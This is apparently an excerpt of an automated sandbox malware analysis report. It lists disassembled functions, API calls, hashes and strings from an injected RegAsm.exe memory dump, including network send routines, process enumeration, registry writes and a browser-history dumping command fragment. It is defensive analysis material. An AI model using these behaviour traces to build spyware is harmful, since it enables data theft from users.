                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                          • _free.LIBCMT ref: 0044943D
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00449609
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID:
                          • API String ID: 1286116820-0
                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                          APIs
                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                          • String ID:
                          • API String ID: 2180151492-0
                          • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                          • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                          • __alloca_probe_16.LIBCMT ref: 00451231
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                          • __freea.LIBCMT ref: 0045129D
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                          • String ID:
                          • API String ID: 313313983-0
                          • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                          • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                          • _free.LIBCMT ref: 100071B8
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                          • _free.LIBCMT ref: 0044F43F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                          • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                          • _free.LIBCMT ref: 10005BB4
                          • _free.LIBCMT ref: 10005BDB
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                          • _free.LIBCMT ref: 00448353
                          • _free.LIBCMT ref: 0044837A
                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat
                          • String ID:
                          • API String ID: 493641738-0
                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                          APIs
                          • _free.LIBCMT ref: 100091D0
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100091E2
                          • _free.LIBCMT ref: 100091F4
                          • _free.LIBCMT ref: 10009206
                          • _free.LIBCMT ref: 10009218
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                          APIs
                          • _free.LIBCMT ref: 00450A54
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00450A66
                          • _free.LIBCMT ref: 00450A78
                          • _free.LIBCMT ref: 00450A8A
                          • _free.LIBCMT ref: 00450A9C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                          APIs
                          • _free.LIBCMT ref: 1000536F
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10005381
                          • _free.LIBCMT ref: 10005394
                          • _free.LIBCMT ref: 100053A5
                          • _free.LIBCMT ref: 100053B6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                          APIs
                          • _free.LIBCMT ref: 00444106
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00444118
                          • _free.LIBCMT ref: 0044412B
                          • _free.LIBCMT ref: 0044413C
                          • _free.LIBCMT ref: 0044414D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                          APIs
                          • _strpbrk.LIBCMT ref: 0044E7B8
                          • _free.LIBCMT ref: 0044E8D5
                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                          • String ID: *?$.
                          • API String ID: 2812119850-3972193922
                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                          APIs
                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                          • String ID: XQG$NG$PG
                          • API String ID: 1634807452-3565412412
                          • Opcode ID: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                          • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                          • Opcode Fuzzy Hash: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                          • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                          • _free.LIBCMT ref: 10004CE8
                          • _free.LIBCMT ref: 10004CF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          • API String ID: 2506810119-1068371695
                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                          • _free.LIBCMT ref: 004435E0
                          • _free.LIBCMT ref: 004435EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          • API String ID: 2506810119-1068371695
                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                          • String ID: /sort "Visit Time" /stext "$0NG
                          • API String ID: 368326130-3219657780
                          • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                          • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                          APIs
                          • _wcslen.LIBCMT ref: 00416330
                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
